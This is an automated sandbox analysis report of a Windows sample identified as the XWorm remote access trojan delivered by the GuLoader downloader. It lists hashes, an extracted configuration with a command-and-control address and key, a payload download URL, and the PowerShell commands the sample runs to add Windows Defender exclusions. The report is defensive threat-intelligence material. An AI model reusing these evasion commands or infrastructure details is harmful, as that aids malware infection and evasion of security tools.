Resubmissions

24/11/2024, 15:40 UTC

241124-s4cllssndp 10

24/11/2024, 15:36 UTC

241124-s1w6vasmdk 10

Analysis

  • max time kernel
    59s
  • max time network
    69s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    24/11/2024, 15:40 UTC

General

  • Target

    18ea5087eb82e075ca35d2b2dcff9450.exe

  • Size

    555KB

  • MD5

    18ea5087eb82e075ca35d2b2dcff9450

  • SHA1

    dc436fbaa777672d44a8b90b98c4a1c266885845

  • SHA256

    a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725

  • SHA512

    8fbeb3caf13a3fe1359002c2848ff5767e6b2f226049546c683f2b6144756196cfe39f66e4959c8426cdfaeff6a169a4cf5939de241e4a898887d8810ec620c6

  • SSDEEP

    12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs

Malware Config

Extracted

Family

xworm

Version

3.1

C2

87.121.86.8:4020

Mutex

ssjpS2lhbkGsnEgT

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain
1
9g5AvmiEFB6IX39iQ9WYsA==

Signatures

  • Detect Xworm Payload 1 IoCs
  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe
    "C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:3628
    • C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe
      "C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe"
      2⤵
      • Drops startup file
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4720
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2248
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3224

    Network

    • flag-us
      DNS
      mertvinc.com.tr
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      8.8.8.8:53
      Request
      mertvinc.com.tr
      IN A
      Response
      mertvinc.com.tr
      IN A
      185.244.144.68
    • flag-us
      DNS
      68.144.244.185.in-addr.arpa
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      8.8.8.8:53
      Request
      68.144.244.185.in-addr.arpa
      IN PTR
      Response
      68.144.244.185.in-addr.arpa
      IN PTR
      185-244-144-68birbircomtr
    • flag-tr
      GET
      http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      185.244.144.68:80
      Request
      GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Host: mertvinc.com.tr
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Connection: Keep-Alive
      Content-Type: application/octet-stream
      Last-Modified: Wed, 20 Nov 2024 06:43:56 GMT
      Etag: "8e40-673d852c-bd5a9871c8854887;;;"
      Accept-Ranges: bytes
      Content-Length: 36416
      Date: Sun, 24 Nov 2024 14:47:17 GMT
      Server: LiteSpeed
      X-Powered-By: PleskLin
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • 185.244.144.68:80
      http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
      http
      18ea5087eb82e075ca35d2b2dcff9450.exe
      1.7kB
      38.0kB
      32
      31

      HTTP Request

      GET http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin

      HTTP Response

      200
    • 87.121.86.8:4020
      18ea5087eb82e075ca35d2b2dcff9450.exe
      260 B
      5
    • 87.121.86.8:4020
      18ea5087eb82e075ca35d2b2dcff9450.exe
      208 B
      4
    • 8.8.8.8:53
      mertvinc.com.tr
      dns
      18ea5087eb82e075ca35d2b2dcff9450.exe
      134 B
      192 B
      2
      2

      DNS Request

      mertvinc.com.tr

      DNS Response

      185.244.144.68

      DNS Request

      68.144.244.185.in-addr.arpa

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d0c46cad6c0778401e21910bd6b56b70

      SHA1

      7be418951ea96326aca445b8dfe449b2bfa0dca6

      SHA256

      9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

      SHA512

      057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      db92d7041e62fca2713935081f1c4a78

      SHA1

      8c0fd39ff312916983080f1cfc7ec620686c1d07

      SHA256

      29b298203b31984a0a51e20d9d816b5fda7013a8390d93d327ec2a72486d65b9

      SHA512

      ecd20994c634bda0d20a344fe1cdea7f00154b83f19213a4d1205aec21deb1f03d1eb85c9c93bd7a6cc000dbdb6d1acfdf81d072c715b6a2d53067298b1f7359

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      6fc9e38f184d3b1e45cdc8758b9346b6

      SHA1

      7bce57efd6a77a3bfe8c53ad443e3faa18740568

      SHA256

      21e6f547ca65e845c9e4fb8e278689b07b124a93d435143a8e0eec4151d62391

      SHA512

      894805a8282c72f355a50216329e682fc36981789f1cdcfe48d3a6383d875f8f270bb29a98e3039dd6007eb49e86c29f68f8e20548a81c4eaf4bae0aa70fed07

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbnwudxm.3r4.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\nsq88F7.tmp\System.dll

      Filesize

      11KB

      MD5

      75ed96254fbf894e42058062b4b4f0d1

      SHA1

      996503f1383b49021eb3427bc28d13b5bbd11977

      SHA256

      a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7

      SHA512

      58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

    • memory/2988-88-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

    • memory/3188-102-0x0000000037200000-0x00000000377A6000-memory.dmp

      Filesize

      5.6MB

    • memory/3188-14-0x00000000007E0000-0x0000000001AF7000-memory.dmp

      Filesize

      19.1MB

    • memory/3188-15-0x00000000007E0000-0x00000000007F0000-memory.dmp

      Filesize

      64KB

    • memory/3188-16-0x0000000036900000-0x000000003699C000-memory.dmp

      Filesize

      624KB

    • memory/3188-18-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

    • memory/3188-104-0x00000000379D0000-0x00000000379DA000-memory.dmp

      Filesize

      40KB

    • memory/3188-103-0x0000000037910000-0x00000000379A2000-memory.dmp

      Filesize

      584KB

    • memory/3188-12-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

    • memory/3628-13-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

    • memory/3628-11-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

    • memory/3628-10-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

    • memory/3628-9-0x00007FF9377C1000-0x00007FF9378EA000-memory.dmp

      Filesize

      1.2MB

    • memory/3628-8-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

    • memory/4584-35-0x0000000006DC0000-0x0000000006DF4000-memory.dmp

      Filesize

      208KB

    • memory/4584-53-0x0000000007D90000-0x0000000007DA5000-memory.dmp

      Filesize

      84KB

    • memory/4584-36-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

    • memory/4584-45-0x00000000079D0000-0x00000000079EE000-memory.dmp

      Filesize

      120KB

    • memory/4584-46-0x0000000007A00000-0x0000000007AA4000-memory.dmp

      Filesize

      656KB

    • memory/4584-47-0x0000000008180000-0x00000000087FA000-memory.dmp

      Filesize

      6.5MB

    • memory/4584-48-0x0000000007B40000-0x0000000007B5A000-memory.dmp

      Filesize

      104KB

    • memory/4584-49-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

      Filesize

      40KB

    • memory/4584-50-0x0000000007DE0000-0x0000000007E76000-memory.dmp

      Filesize

      600KB

    • memory/4584-51-0x0000000007D50000-0x0000000007D61000-memory.dmp

      Filesize

      68KB

    • memory/4584-52-0x0000000007D80000-0x0000000007D8E000-memory.dmp

      Filesize

      56KB

    • memory/4584-34-0x0000000006830000-0x000000000687C000-memory.dmp

      Filesize

      304KB

    • memory/4584-54-0x0000000007EA0000-0x0000000007EBA000-memory.dmp

      Filesize

      104KB

    • memory/4584-55-0x0000000007E80000-0x0000000007E88000-memory.dmp

      Filesize

      32KB

    • memory/4584-33-0x0000000006800000-0x000000000681E000-memory.dmp

      Filesize

      120KB

    • memory/4584-19-0x0000000002FE0000-0x0000000003016000-memory.dmp

      Filesize

      216KB

    • memory/4584-32-0x0000000006350000-0x00000000066A7000-memory.dmp

      Filesize

      3.3MB

    • memory/4584-20-0x0000000005BD0000-0x00000000061FA000-memory.dmp

      Filesize

      6.2MB

    • memory/4584-23-0x00000000062E0000-0x0000000006346000-memory.dmp

      Filesize

      408KB

    • memory/4584-22-0x0000000006270000-0x00000000062D6000-memory.dmp

      Filesize

      408KB

    • memory/4584-21-0x0000000005960000-0x0000000005982000-memory.dmp

      Filesize

      136KB

    • memory/4720-69-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

    • memory/4720-59-0x0000000005B30000-0x0000000005E87000-memory.dmp

      Filesize

      3.3MB